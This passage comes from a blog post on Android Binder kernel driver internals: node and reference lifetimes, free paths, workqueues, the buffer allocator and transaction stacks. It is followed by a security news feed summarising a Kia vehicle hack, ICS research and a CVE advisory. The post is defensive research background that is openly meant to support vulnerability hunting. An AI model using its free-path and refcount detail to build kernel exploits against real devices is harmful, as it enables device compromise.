summarized as follows: binder_node->internal_strong_refs == 0 binder_node->local_strong_refs == 0 binder_node->local_weak_refs == 0 binder_node->tmp_refs == 0 binder_node->refs == 0 // hlist_empty(node->refs) binder_deferred_release When a client closes the Binder file descriptor (binder_deferred_release), Binder traverses a rb_tree that contains all binder_node owned by the binder_proc and frees them. The binder_node_release function is used to free a binder_node only if the following conditions are met [1]: The binder_node has zero binder_ref in its refs list. The tmp_refs counter of the binder_node must equal 1. static void binder_deferred_release(struct binder_proc *proc) { ... while ((n = rb_first(&proc->nodes))) { struct binder_node *node; node = rb_entry(n, struct binder_node, rb_node); ... incoming_refs = binder_node_release(node, incoming_refs); ... } ... } static int binder_node_release(struct binder_node *node, int refs) { ... if (hlist_empty(&node->refs) && node->tmp_refs == 1) { // [1] ... binder_free_node(node); ... } binder_ref A binder_ref represents a reference that a client holds to the port (binder_node) of a separate client, which forms a connection. Therefore, a binder_ref can only exist when its owner (binder_proc) and its associated port (binder_node) are alive. Allocation There are two scenarios where Binder creates a new binder_ref. In the binder_node section, we examined the first scenario: a client sends a BINDER_TYPE_*BINDER to another client. In the end, Binder creates a new binder_node together with a binder_ref. When translating the BINDER_TYPE_BINDER to a BINDER_TYPE_HANDLE [1], Binder tries to find an existing binder_ref associated with the binder_node [2]. If none exists, Binder allocates a new binder_ref. static int binder_translate_binder(...) // [1] { ... ret = binder_inc_ref_for_node(target_proc, node, fp->hdr.type == BINDER_TYPE_BINDER, &thread->todo, &rdata); ... } static int binder_inc_ref_for_node(...) { struct binder_ref *ref; struct binder_ref *new_ref = NULL; ... ref = binder_get_ref_for_node_olocked(proc, node, NULL); // [2] if (!ref) { ... new_ref = kzalloc(sizeof(*ref), GFP_KERNEL); // [3] ... return ret; } The second scenario is when a client sends a BINDER_TYPE_HANDLE or BINDER_TYPE_WEAK_BINDER to another client. Before forwarding the transaction, Binder calls the binder_translate_handle function to process flat_binder_object of type BINDER_TYPE_HANDLE or BINDER_TYPE_WEAK_HANDLE. static void binder_transaction(...) { ... case BINDER_TYPE_HANDLE: case BINDER_TYPE_WEAK_HANDLE: { struct flat_binder_object *fp; fp = to_flat_binder_object(hdr); ret = binder_translate_handle(fp, t, thread); // [1] ... } break; ... } Binder searches for the binder_node associated with a binder_ref that has a matching handle identifier [1]. If the binder_node is not owned by the receiving client [2], Binder calls the binder_inc_ref_for_node function to get a binder_ref [3] and assign a new handle identifier [4]. static int binder_translate_handle(struct flat_binder_object *fp, struct binder_transaction *t, struct binder_thread *thread) { struct binder_proc *proc = thread->proc; struct binder_proc *target_proc = t->to_proc; struct binder_node *node; ... node = binder_get_node_from_ref(proc, fp->handle, fp->hdr.type == BINDER_TYPE_HANDLE, &src_rdata); // [1] ... if (node->proc == target_proc) { // [2] ... } else { ... ret = binder_inc_ref_for_node(target_proc, node, // [3] fp->hdr.type == BINDER_TYPE_HANDLE, NULL, &dest_rdata); ... fp->handle = dest_rdata.desc; // [4] ... } ... } The binder_inc_ref_for_node function first searches for any existing binder_ref that is associated with that binder_node [1]. If none exists [2], Binder creates a new binder_ref for the receiving client. static int binder_inc_ref_for_node(struct binder_proc *proc, struct binder_node *node, ...) { struct binder_ref *ref; struct binder_ref *new_ref = NULL; ... ref = binder_get_ref_for_node_olocked(proc, node, NULL); // [1] if (!ref) { // [2] ... new_ref = kzalloc(sizeof(*ref), GFP_KERNEL); // [2] ... } ... } Finally, Binder creates a new binder_ref and links it to an existing binder_node in the kernel. In the userspace, the receiving client will receive the transaction that contains the flat_binder_object with the header type BINDER_TYPE_HANDLE and a handle identifier. Subsequently, Client C can initiate a transaction or RPC with Client A using the designated handle identifier. Through this process, Client B has granted the same communication channel to Client C, allowing it to initiate new RPC with Client A. Reference Counters Within a binder_ref, the data field tracks the count of strong and weak references acquired by a userspace program. /* * struct binder_ref - struct to track references on nodes * @data: binder_ref_data containing id, handle, and current refcounts ... */ struct binder_ref { struct binder_ref_data data; ... } struct binder_ref_data { int debug_id; uint32_t desc; int strong; int weak; }; A userspace program can use the following BC_* commands to update one of the reference counters of a given handle identifier. Increment (+1) Decrement (-1) strong BC_ACQUIRE BC_RELEASE weak BC_INCREFS BC_DECREFS The binder_thread_write function processes those commands and updates the binder_ref with the given handle identifier. This update is done using the binder_update_ref_for_handle function. static int binder_thread_write(...) { ... while (ptr < end && thread->return_error.cmd == BR_OK) { switch (cmd) { case BC_INCREFS: case BC_ACQUIRE: case BC_RELEASE: case BC_DECREFS: { ... bool strong = cmd == BC_ACQUIRE || cmd == BC_RELEASE; bool increment = cmd == BC_INCREFS || cmd == BC_ACQUIRE; ... if (ret) ret = binder_update_ref_for_handle( proc, target, increment, strong, &rdata); ... A client can acquire additional strong references on the binder_ref by sending the BC_ACQUIRE command. It will only increment the internal_strong_refs of the associated binder_node if no strong references (data.strong) is held before. static int binder_inc_ref_olocked(struct binder_ref *ref, int strong, struct list_head *target_list) { ... if (strong) { if (ref->data.strong == 0) { ret = binder_inc_node(ref->node, 1, 1, target_list); ... ref->data.strong++; ... } A client can also release a strong reference on the binder_ref by sending the BC_RELEASE command. When there are zero strong references, Binder decrements the internal_strong_refs of the associated binder_node. static bool binder_dec_ref_olocked(struct binder_ref *ref, int strong) { if (strong) { ... ref->data.strong--; if (ref->data.strong == 0) binder_dec_node(ref->node, strong, 1); ... } Destroy The binder_free_ref function is used to free a binder_ref object. static void binder_free_ref(struct binder_ref *ref) { ... kfree(ref); } There are two code paths where the binder_free_ref function is called: binder_thread_write binder_deferred_release binder_thread_write As we discussed earlier, a client can send specific BC_* commands to update the reference counter of a binder_ref with the given handle identifier. The binder_thread_write function is responsible for processing those commands. static int binder_thread_write(...) { ... switch (cmd) { case BC_INCREFS: case BC_ACQUIRE: case BC_RELEASE: case BC_DECREFS: { ... bool strong = cmd == BC_ACQUIRE || cmd == BC_RELEASE; bool increment = cmd == BC_INCREFS || cmd == BC_ACQUIRE; ... ret = binder_update_ref_for_handle( proc, target, increment, strong, &rdata); ... } When updating the reference counter of a binder_ref with a given handle identifier, binder_update_ref_for_handle frees the binder_ref if binder_dec_ref_olocked returns true. static int binder_update_ref_for_handle(struct binder_proc *proc, uint32_t desc, bool increment, bool strong, struct binder_ref_data *rdata) { bool delete_ref = false; ... delete_ref = binder_dec_ref_olocked(ref, strong); ... if (delete_ref) { binder_free_ref(ref); ... } ... } The binder_dec_ref_olocked function returns true to inform the caller that the binder_ref can be safely freed, if data.strong and data.weak become zero [1]. static bool binder_dec_ref_olocked(struct binder_ref *ref, int strong) { ... if (ref->data.strong == 0 && ref->data.weak == 0) { // [1] ... return true; } ... } binder_deferred_release When a client closes the Binder file descriptor (binder_deferred_release), Binder traverses a rb_tree that contains all binder_ref owned by the binder_proc and frees them. static void binder_deferred_release(struct binder_proc *proc) { ... while ((n = rb_first(&proc->refs_by_desc))) { struct binder_ref *ref; ref = rb_entry(n, struct binder_ref, rb_node_desc); ... binder_free_ref(ref); ... } ... } Binder Concurrency Model Binder is designed to facilitate remote procedure calls (RPC) between clients. A client initiates communication by sending commands prefixed with BC_*. These commands are accompanied by relevant data specific to the command. Then, the client waits for a response prefixed with BR_* from Binder. In the beginning, a single-threaded client initiates a RPC by send a BC_TRANSACTION command to Binder. Then, Binder forwards the command as a BR_TRANSACTION response to the recipient client. To return the RPC result, the recipient client sends a BC_REPLY command along with the result data back to Binder. Finally, Binder forwards it back to the client as a BR_REPLY response, completing the RPC process. In scenarios involving multiple RPCs, a single-threaded client receives all incoming transactions in a first-in-first-out (FIFO) order. The client cannot read the next transaction until it has replied to the current one. Multithreaded Client Binder has support for multithreaded clients, enabling them to simultaneously process multiple RPCs in separate threads. Therefore, Binder maintains a list of threads (binder_thread) owned by a client (binder_proc). When a client process spawns a new thread, the child thread inherits the previously opened Binder file descriptor. This file descriptor is associated with the same client binder_proc as the parent thread. int binder_fd = open("/dev/binder", O_RDWR | O_CLOEXEC); ... pid_t pid = fork(); // spawns a new thread if (pid == -1) { // fork failed return 1; } else if (pid > 0) { // child thread starts here ... ret = ioctl(binder_fd, BINDER_WRITE_READ, &bwr); // do ioctls on inherited // `binder_fd` ... } else { // parent thread starts here ... ret = ioctl(binder_fd, BINDER_WRITE_READ, &bwr); // do ioctls on `binder_fd` ... } Binder identifies the thread making the ioctl calls by its process ID (task_struct->pid). Note: In userspace, the term “thread ID” corresponds to the process ID used in the kernel (task_struct->pid). Meanwhile, the term “process ID” refers to the thread group ID (task_struct->tgid). Binder uses several workqueues to distribute incoming transactions: a main workqueue for each client (binder_proc->todo) and a thread workqueue for each thread (binder_thread->todo). We will dive deeper into the concept of workqueues in the next section (Binder Workqueues). Register as a Looper Before a child thread can retrieve an incoming transaction from the main workqueue, it must first register itself as a looper. This is achieved by sending the BC_ENTER_LOOPER or BC_REGISTER_LOOPER command to Binder upon spawning. Subsequently, when the child thread performs a read operation (BINDER_WRITE_READ ioctl), Binder retrieves the next transaction from the main workqueue and passes it to the child thread for processing. The overall multithreaded client is not required to respond to every transaction in a FIFO order. However, each thread must still adhere to the FIFO order when replying to its own workqueue. A client thread can invoke the BINDER_THREAD_EXIT ioctl to exit early. Then, Binder cleans up all pending work in the thread’s workqueue and notifies the client that initiates the transaction with the BR_DEAD_REPLY response. Request a New Looper When Binder cannot find a thread with an empty workqueue, it sends a BR_SPAWN_LOOPER response to the latest thread that is performing a read operation. This response requests the client to spawn a new thread to handle more future workloads. Spawning a new thread is not mandatory for the client. However, if it does, the new thread must register itself as a looper (BC_REGISTER_LOOPER) after spawn. A client can configure the maximum number of threads it would like to support in advance using the BINDER_SET_MAX_THREADS ioctl. Once this limit is reached, Binder will not request any additional thread (BR_SPAWN_LOOPER). Asynchronous Transaction Binder supports one-way or asynchronous transactions, which does not require the recipient client to reply to. To initiate an asynchronous transaction, the sender sets the TF_ONE_WAY flag in the binder_transaction->flags field. The recipient client will receive regular transactions and asynchronous transactions together in a FIFO order. However, Binder manages asynchronous transactions by queuing them in a dedicated asynchronous workqueue associated with each port (binder_node->async_todo). To read the next asynchronous transaction from a port’s asynchronous workqueue (binder_node->async_todo), the receiving client must first free the current one assigned in it using the BC_FREE_BUFFER command. After all, asynchronous transactions sent to the same client but different ports (binder_node) can still be processed simultaneously. Binder Workqueues and Work Items Binder employs multiple workqueues to enable concurrency while maintaining transaction order. Each workqueue is represented as a doubly linked list with only the head pointer (struct list_head) being stored. There are three types of workqueue in Binder: Main client workqueue (binder_proc->todo): Stores all work items assigned to a client Individual client thread workqueue (binder_thread->todo): Stores work items assigned to a specific client thread. Individual binder_node asynchronous workqueue (binder_node->async_todo): Stores only a list of work items that relate to asynchronous transactions (BINDER_WORK_TRANSACTION). Each work item is defined by a struct binder_work that can be added to a workqueue. The struct binder_work can be used independently or incorporated as a field within an object. It contains an entry node (entry) to be linked in a workqueue and the work type enum (type). struct binder_work { struct list_head entry; enum binder_work_type { BINDER_WORK_TRANSACTION = 1, BINDER_WORK_TRANSACTION_COMPLETE, BINDER_WORK_TRANSACTION_PENDING, BINDER_WORK_TRANSACTION_ONEWAY_SPAM_SUSPECT, BINDER_WORK_RETURN_ERROR, BINDER_WORK_NODE, BINDER_WORK_DEAD_BINDER, BINDER_WORK_DEAD_BINDER_AND_CLEAR, BINDER_WORK_CLEAR_DEATH_NOTIFICATION, } type; }; When a client performs a read operation (BINDER_WRITE_READ ioctl), Binder processes the next work item [1] and translates it into the appropriate response (BR_*) back to userspace [2]. To retrieve the next work item, Binder first checks the current client thread’s workqueue (binder_thread->todo) before looking in the main client workqueue (binder_proc->todo). static int binder_thread_read(...) { while (1) { ... w = binder_dequeue_work_head_ilocked(list); // [1] ... switch (w->type) { ... case BINDER_WORK_TRANSACTION_COMPLETE: case BINDER_WORK_TRANSACTION_PENDING: case BINDER_WORK_TRANSACTION_ONEWAY_SPAM_SUSPECT: { ... if (proc->oneway_spam_detection_enabled && w->type == BINDER_WORK_TRANSACTION_ONEWAY_SPAM_SUSPECT) cmd = BR_ONEWAY_SPAM_SUSPECT; else if (w->type == BINDER_WORK_TRANSACTION_PENDING) cmd = BR_TRANSACTION_PENDING_FROZEN; else cmd = BR_TRANSACTION_COMPLETE; ... if (put_user(cmd, (uint32_t __user *)ptr)) // [2] ... } When an asynchronous transaction is released, Binder dequeues a new one from the binder_node asynchronous workqueue (binder_node->async_todo) and queues it in the workqueue associated with the client thread that initiated the release (binder_thread->todo). There are five categories of work items, each with a designated container and specific work type enums: Category Container Work Type Enum Transaction binder_transaction BINDER_WORK_TRANSACTION Transaction status update None BINDER_WORK_TRANSACTION_COMPLETE BINDER_WORK_TRANSACTION_PENDING BINDER_WORK_TRANSACTION_ONEWAY_SPAM_SUSPECT Binder node update binder_node BINDER_WORK_NODE Death notifications binder_ref_death BINDER_WORK_DEAD_BINDER BINDER_WORK_DEAD_BINDER_AND_CLEAR BINDER_WORK_CLEAR_DEATH_NOTIFICATION Error binder_error BINDER_WORK_RETURN_ERROR Transaction In the Binder Concurrency Model section, we discussed how Binder distributes incoming transactions as work items across multiple threads within a client process. Every transaction (binder_transaction) is processed and queued in either the main client workqueue (binder_proc->todo) or individual thread work queue (binder_thread->todo). New transactions are initially assigned as a BINDER_WORK_TRANSACTION work item to the main recipient client workqueue (binder_proc->todo). Upon reading, Binder processes the work item and sends the BR_TRANSACTION response back to userspace along with the transaction data. On the other hand, reply transactions are specifically assigned to the workqueue of the client thread (binder_thread->todo) that initiated the first transaction. This guarantees that the thread that initiated the first transaction is the same thread that receives the reply. Upon reading, Binder sends the BR_REPLY response back to the userspace along with the transaction data. Transaction Status Update A transaction is considered complete after a reply is received or an asynchronous transaction is sent. Binder queues the BINDER_WORK_TRANSACTION_COMPLETE work item in the workqueue of the client thread that initiated the transaction (binder_thread->todo). After processing this work item, Binder returns the BR_TRANSACTION_COMPLETE response back to the userspace. In scenarios where an asynchronous transaction is sent to a frozen thread, Binder queues the BINDER_WORK_TRANSACTION_PENDING work item in the main workqueue of the client (binder_proc->todo) that initiated the transaction. Finally, if an asynchronous transaction is received and the binder buffer allocator is full, Binder queues the BINDER_WORK_TRANSACTION_ONEWAY_SPAM_SUSPECT work item in the main workqueue of the recipient client (binder_proc->todo). Death Notifications Binder supports death notifications, which allows clients to be notified when a connected client they’re interacting with exits. Binder tracks this by creating a binder_ref_death object containing the work item (binder_work) and assigning it to the binder_ref->death. When a binder_ref is released, Binder checks for an associated binder_ref_death. If found, Binder locates the corresponding binder_node and queues it as a BINDER_WORK_DEAD_BINDER work item in the main workqueue of the owner of that binder_node. When the client performs a read, Binder will send the BR_DEAD_BINDER response, notifying which client that was registered has exited. Upon sending the BR_DEAD_BINDER response, Binder adds the work item in the binder_proc->delivered_death list. The client is expected to send the BC_DEAD_BINDER_DONE command, indicating that it has processed the death notification. Then, Binder removes the work item from the delivered_death list. Clients also have the option to unregister death notifications. Upon success, Binder queues the BINDER_WORK_CLEAR_DEATH_NOTIFICATION work item in the main workqueue of the client that initiates the operation. However, if the registered client dies during this process, Binder queues the BINDER_WORK_DEAD_BINDER_AND_CLEAR work item, indicating that the operation failed because the client had already exited. Binder Node The BINDER_WORK_NODE work item provides updates to the client about the presence or absence of strong or weak references of a binder_node. Depending on who initiated the operation, Binder assigns the binder_node->work as a BINDER_WORK_NODE work item to either the main client workqueue or a client thread workqueue. For example, if a client sends a BINDER_TYPE_BINDER to another client, which results in the creation of a binder_ref and an increase in the strong reference of the binder_node, Binder then assigns the work item to the workqueue of the client thread that sends it. Meanwhile, if another client acquires a strong reference on its binder_ref, leading to an increase in the strong reference of the binder_node owned by another client, Binder assigns the work item to the main workqueue of the other client. Binder informs the userspace changes the presence or absence of strong or weak references only once. Binder uses the has_strong_ref and has_weak_ref fields within the binder_node to monitor the changes. When Binder processes the BINDER_WORK_NODE work item, it updates these fields and returns one of four responses based on the changes: BR_INCREFS: has_weak_ref transitions from zero to one BR_ACQUIRE: has_strong_ref transitions from zero to one BR_RELEASE: has_strong_ref transitions from one to zero BR_DECREFS: has_weak_ref transitions from one to zero static int binder_thread_read(...) { ... case BINDER_WORK_NODE: { ... // Save the previous values has_strong_ref = node->has_strong_ref; has_weak_ref = node->has_weak_ref; ... // Update the presence of strong and weak references if (weak && !has_weak_ref) { node->has_weak_ref = 1; ... } if (strong && !has_strong_ref) { node->has_strong_ref = 1; ... } if (!strong && has_strong_ref) node->has_strong_ref = 0; if (!weak && has_weak_ref) node->has_weak_ref = 0; ... // Check for any changes and return approriate responses if (weak && !has_weak_ref) ret = binder_put_node_cmd(..., BR_INCREFS, "BR_INCREFS"); if (!ret && strong && !has_strong_ref) ret = binder_put_node_cmd(..., BR_ACQUIRE, "BR_ACQUIRE"); if (!ret && !strong && has_strong_ref) ret = binder_put_node_cmd(..., BR_RELEASE, "BR_RELEASE"); if (!ret && !weak && has_weak_ref) ret = binder_put_node_cmd(..., BR_DECREFS, "BR_DECREFS"); Error When certain operations either complete or fail, Binder queues the BINDER_WORK_RETURN_ERROR work item into the workqueue of the client thread that initiated it. Binder processes this work item and returns either the BR_OK or BR_ERROR response back to userspace. Binder Buffer Allocator Initialization Binder implements a memory allocator to store incoming transaction data, which we will call the binder buffer allocator. Every client binder_proc owns a binder buffer allocator binder_alloc which allocates memory for incoming transaction data. During initialization, a client must create a memory map for the Binder device file descriptor as follows: #define BINDER_VM_SIZE 4 * 1024 * 1024 int binder_fd = open("/dev/binder", O_RDWR | O_CLOEXEC); void *map = mmap(nullptr, BINDER_VM_SIZE, PROT_READ, MAP_PRIVATE, binder_fd, 0); The mmap syscall will call binder_mmap to reserve a virtual memory area and map it to the userspace. Binder defers the allocation of physical backing pages to store incoming transaction data until needed (lazy allocation). Binder relies on the integrity of the transaction data in the allocator’s memory for cleanup. If the active transaction data is corrupted, it could lead to memory corruptions and even code execution in the kernel as demonstrated in the CVE-2020-0041 and CVE-2023-20938 writeups. As a result, Binder only allows users to create a read-only memory map (PROT_READ) and prevents them from modifying its access permission later. Best-Fit Allocation The binder buffer allocator implements the best-fit allocation strategy with the kernel’s red-black tree data structure (rb_tree). The binder buffer allocator starts with a single binder_buffer, which takes up the whole buffer space and is labeled as unused. When sending a transaction to a client, Binder first allocates a binder_transaction object to store information about the transaction. Then, the binder buffer allocator allocates a binder_buffer object to own a chunk of memory in the memory map and assign it to the binder_transaction. Allocate a Buffer When a client (Client A) sends a transaction with data, Binder allocates a binder_buffer from the target client’s (Client B) binder buffer allocator and copies the data into it. The target client receives the transaction and reads the data from the memory map. Free a Buffer To free a transaction and its data, a client sends a BC_FREE_BUFFER message with the start address of the transaction data. Binder then frees the binder_transaction and sets the free field of the binder_buffer. If adjacent memory is also freed, the binder buffer allocator merges the two binder_buffer into one. Zero Out Transaction Data The binder buffer allocator does not zero out the transaction data after freeing the transaction. A client has read access to the memory map, so it can still read the transaction data after freeing it (BC_FREE_BUFFER). To zero out the transaction data after free, the sender must explicitly set the TF_CLEAR_BUF flag in the binder_transaction_data when sending the BC_TRANSACTION command. For stub and proxy code generated from the AIDL, developers can annotate the interface with @SensitiveData to explicitly set the TF_CLEAR_BUF flag in all outgoing transactions. This prevents sensitive data in the transaction from remaining in memory after free. For example, the IKeyMintOperation.aidl AIDL interface used by Keymint is annotated with @SensitiveData. @SensitiveData interface IKeyMintOperation { ... } Binder Transaction Stacks As we discussed in Binder Concurrency Model, a single-threaded client cannot retrieve the next incoming transaction until it has responded to the current one. On the caller side, a single-threaded client cannot initiate a new RPC (BC_TRANSACTION) until it receives a reply (BR_REPLY) to the previous RPC. To maintain these orders, Binder tracks every incoming and outgoing transaction between two different threads on a transaction stack. The purpose of transaction stacks is different from the Binder Workqueues whose purpose is to support concurrency among multiple threads in a client. Note: Every transaction is only associated with one sender thread and one receiver thread during its lifetime, regardless of whether the client is multithreaded or not. A Chain Request with Multiple Clients It is common to have multiple clients working with each other to serve a RPC request. The diagram below shows an example of a RPC originating from A that involves multiple single-threaded clients. It is a chain of transactions in the following order: A -> B -> C -> D -> B Binder allows a client to handle multiple pending transactions at the same time. For example, client B has two pending transactions at one point, one coming from A and another coming from D. However, the client can only respond with BR_REPLY to those pending transactions in the last-in-first-out (LIFO) order. In addition, when one of the clients in the chain dies, Binder ensures proper error handling by delivering errors back to every involved client in the correct order. Two Stack Layouts Binder puts every transaction on two different stacks, which we will call the chain transaction stack and the thread transaction stack. Let’s have an overview of the functions each stack serves: Chain transaction stack The order of transactions of a chain request. Binder traverses it to clean up the chain request when one of the clients exits early. Thread transaction stack The order of transactions that is sent or received by a client Binder traverses it to clean up and release transactions, which a client participated in before exit. Binder implements these two stacks as two linked lists with the following fields in binder_transaction: struct binder_transaction { ... struct binder_transaction *from_parent; struct binder_transaction *to_parent; ... struct binder_thread *from; struct binder_thread *to_thread; ... } The binder_thread stores a pointer to the top element of its thread transaction stack in the transaction_stack field. This top element represents the last transaction that the thread sent or received. struct binder_thread { ... struct binder_transaction *transaction_stack ... } Push a Transaction When a client initiates a transaction (BC_TRANSACTION), Binder pushes the transaction onto the sender’s thread transaction stack. This is achieved by setting the from_parent field of the new transaction (binder_transaction) to point to the current top of the sender’s stack (transaction_stack). Then, the top of the stack is updated to point to the new transaction (binder_transaction). binder_transaction t; binder_thread sender; ... t->from_parent = sender->transaction_stack; sender->transaction_stack = t; When a client reads a transaction, Binder pushes the transaction onto the receiver’s thread transaction stack. This is achieved by setting the to_parent field of the new transaction (binder_transaction) to point to the current top of the sender’s stack (transaction_stack). Then, the top of the stack is updated to point to the new transaction (binder_transaction). binder_transaction t; binder_thread receiver; ... t->to_parent = receiver->transaction_stack; receiver->transaction_stack = t; Consequently, the chain transaction stack is formed by linking transactions through their from_parent fields, creating a chain of requests. Pop a Transaction Assuming everything is in order, when a client sends a reply (BC_REPLY), Binder pops the current top transaction of the sender’s thread transaction stack. This is achieved by updating the top of the stack to point to the to_parent of the current top transaction. The popped transaction will be the one the sender had received and needs to reply to. static void binder_transaction(..., struct binder_thread *thread, ...) { ... struct binder_transaction *in_reply_to = NULL; ... if (reply) { in_reply_to = thread->transaction_stack; ... thread->transaction_stack = in_reply_to->to_parent; ... } When a client with a pending incoming transaction fails or crashes, Binder cancels the pending request by popping the current top transaction from the sender’s thread transaction stack. The popped transaction will be the one the sender had sent, but the client failed to reply to. To notify the sender of the failure, Binder queues a BINDER_WORK_RETURN_ERROR work item to the sender’s client thread. Later, when the sender tries to read a reply, Binder processes the work item and returns either BR_DEAD_REPLY or BR_FAILED_REPLY according to the cause of the failure. static void binder_pop_transaction_ilocked(struct binder_thread *target_thread, ...) { ... target_thread->transaction_stack = target_thread->transaction_stack->from_parent; ... } When a client with a pending incoming transaction fails to reply or crashes, Binder cancels the pending request by popping the current top transaction from the sender’s thread transaction stack. The popped transaction will be the one the sender had sent, but the client failed to reply to. To notify the sender of the failure, Binder queues a BINDER_WORK_RETURN_ERROR work item to the sender’s client thread. Later, when the sender tries to read a reply, Binder processes the work item and returns either BR_DEAD_REPLY or BR_FAILED_REPLY according to the cause of the failure. Chain Transaction Stack The chain transaction stack tracks the order of transactions in a chain, which originates from the first request. Let’s reuse the example above involving four transactions among A, B, C and D. Before B responds D, the chain transaction stack will look as follows: Binder can traverse the chain transaction stack, by following the from_parent field of any transaction, to find the previous transaction and the first transaction in the chain. Suppose client B exits before responding to the last transaction sent by D. During cleanup, Binder traverses the chain transaction stack starting from the top transaction on B’s transaction_stack to look for its previous client in the chain. Then, it sends a BR_DEAD_REPLY to notify the client that there is a failed reply. In our case, Binder sends BR_DEAD_REPLY to D, which is the previous client before B in the chain. A -> B -> C -> D -> B Binder calls binder_send_failed_reply to traverse the chain transaction stack and sends an error_code (e.g BR_DEAD_REPLY) to the previous client in the chain. static void binder_send_failed_reply(struct binder_transaction *t, uint32_t error_code) { while (1) { target_thread = binder_get_txn_from_and_acq_inner(t); if (target_thread) { ... // Send `error_code` to `target_thread ... return; } next = t->from_parent; } } Thread Transaction Stack The thread transaction stack tracks the order of active transactions that a client has sent and received. Following the previous example, the thread transaction stack of each client will look as follows: Binder utilizes the from_parent and to_parent fields along with from and to_thread to traverse the thread transaction stack of each client thread. By checking if from or to_thread points to the target client thread, it follows either the from_parent or to_parent field to the next transaction in the stack. For example, starting from B’s transaction_stack, Binder checks whether the from or to_thread points to B and follows either the from_parent or to_parent to the next transaction. The first transaction from the top has to_thread pointing to B, so Binder follows to_parent to the next transaction. The second transaction has from pointing to B, so Binder follows the from_parent to the next transaction. When a client thread exits, Binder must remove every reference to that thread within all ongoing transactions. The binder_thread_release, which is responsible for releasing the client thread, handles that cleanup. It traverses the thread transaction stack to remove every reference to the client (binder_proc) and client thread (binder_thread). static int binder_thread_release(struct binder_proc *proc, struct binder_thread *thread) { while (t) { ... if (t->to_thread == thread) { ... t->to_proc = NULL; t->to_thread = NULL; ... t = t->to_parent; } else if (t->from == thread) { t->from = NULL; t = t->from_parent; } } ... } Exploring Binder with libdevbinder We would like to conclude this blog with a quick overview of the libdevbinder project we briefly mentioned in the introduction. As you might have noticed based on the information provided above Binder kernel module is a very complex target for analysis. In order to fully understand semantics of the exposed Binder kernel API to the user-space code via ioctls one would need to study the implementation of libbinder – library which sits on top of the Binder kernel module and provides a higher-level Binder IPC interface to the Android Framework. The libbinder itself consists of multiple files written in C++ & Rust and might be challenging to comprehend for the audience with no prior knowledge in this area. Thus, to facilitate the Binder research and make understanding Binder concepts easier we developed a tiny and simple library – libdevbinder – which serves as an example on how two endpoints running in user-space could communicate with each other over the Binder. This library provides necessary minimalistic implementation sufficient to send a Binder transaction across the IPC interface. As an example, libdevbinder additionally provides two small programs client and server where client sends user-provided data via Binder transaction to the server which prints the received data to stdout. These programs are expected to run on top of a vanilla Linux kernel built with Binder driver enabled config (e.g. in QEMU) – not in an Android environment. Main reason for that is that the server program registers itself with the Binder driver as the context manager. There can only be one context manager per binder device node, which very likely is already claimed by the ServiceManager process on Android. To send the transaction we would use client program which takes as input a string and sends it to the server: ./client “Hello world!” We hope that these tiny examples remove the layer of ambiguity and complexity over the Binder kernel ioctl interface and make researching Binder easier and more convenient. Additional Reading While we couldn’t cover every detail about Binder, here are some additional resources that may be helpful for learning more: https://www.synacktiv.com/publications/binder-transactions-in-the-bowels-of-the-linux-kernel https://events.static.linuxfound.org/images/stories/slides/abs2013_gargentas.pdf (YouTube) https://medium.com/swlh/binder-introduction-54fb90feeecb https://medium.com/swlh/binder-architecture-and-core-components-38089933bba https://medium.com/swlh/binder-threading-model-79077b7c892c Historical context: https://www.osnews.com/story/13674/introduction-to-openbinder-and-interview-with-dianne-hackborn/ http://kroah.com/log/blog/2014/01/15/kdbus-details/ Credits Special thanks to Adam Bacchus, Alice Ryhl, Carlos Llamas, Farzan Karimi, Jon Bottarini and Sindhu Shivkumar for their support with technical questions and review of this post. This post would also not have been possible without the collaborative effort of our amazing team.

/posts/binder-internals/
Hacking Kia: Remotely Controlling Cars With Just a License Plate
2024-09-20T00:00:00Z | 1726790400

On June 11th, 2024, we discovered a set of vulnerabilities in Kia vehicles that allowed remote control over key functions using only a license plate. These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds, regardless of whether it had an active Kia Connect subscription.

https://samcurry.net/hacking-kia
Challenging Assumptions: Enhancing the Understanding of Securing Internet-Exposed Industrial Control Systems
2024-09-20T00:00:00Z | 1726790400

Discover the latest findings from Censys and GreyNoise on the real-world threats facing internet-exposed Industrial Control Systems (ICS). At LABSCon 2024, they revealed surprising research on how attackers prioritize common Remote Access Service (RAS) protocols over ICS-specific communication, highlighting key security challenges for critical infrastructure. Learn more about how internet-connected HMIs are rapidly targeted and the implications for ICS security.

https://www.greynoise.io/blog/challenging-assumptions-enhancing-the-understanding-of-securing-internet-exposed-industrial-control-systems
Shining a Light in the Dark – How Binary Defense Uncovered an APT Lurking in Shadows of IT
2024-09-19T18:30:00Z | 1726770600

Written by ARC Labs contributors, John Dwyer, Eric Gonzalez at Binary Defense and Tyler Hudak at TrustedSec In cybersecurity, the threats we don’t see—or don’t expect—often pose the greatest danger. Recently, this became all too clear when three unmanaged AIX servers, sitting exposed on the internet, opened the door for a China-Nexus Threat Actor to launch an […] The post Shining a Light in the Dark – How Binary Defense Uncovered an APT Lurking in Shadows of IT appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
CVE-2024-7847
2024-09-19T14:26:00Z | 1726755960

CWE-345: INSUFFICIENT VERIFICATION OF DATA AUTHENTICITY A feature in the affected products enables users to prepare a project file with an embedded VBA script and can be configured to run once the project file has been opened without user intervention. This feature can be abused to trick a legitimate user into executing malicious code upon opening an infected RSP/RSS project file. If exploited, a threat actor may be able to perform a remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2024-7847
Hillstone Network Intrusion Prevention System (S-Series)
2024-09-19T14:17:32Z | 1726755452

As the threat landscape continues to evolve aggressively, an increasing number of network protection technologies have quickly emerged. Among these various technologies, Intrusion Prevention System (IPS) remains one of the most widely deployed solutions, regardless of platform or form factor. The post Hillstone Network Intrusion Prevention System (S-Series) appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/resources/hillstone-network-intrusion-prevention-system-s-series/
International Matchmaking Event on Cyber Calls offered information and opportunities to network
2024-09-19T13:25:23Z | 1726752323

National Coordination Centre for Cyber Security Research, Development and Innovation (NCC-FI) together with partners organized an International Matchmaking Event on Cyber Calls at the beginning of September. The event offered information on the current EU funding opportunities as well as insight on current cyber security phenomena. The participants had the opportunity to ask questions from the experts and network with each other.

https://www.kyberturvallisuuskeskus.fi/en/news/international-matchmaking-event-cyber-calls-offered-information-and-opportunities-network
International Matchmaking Event on Cyber Calls offered information and opportunities to network
2024-09-19T13:25:23Z | 1726752323

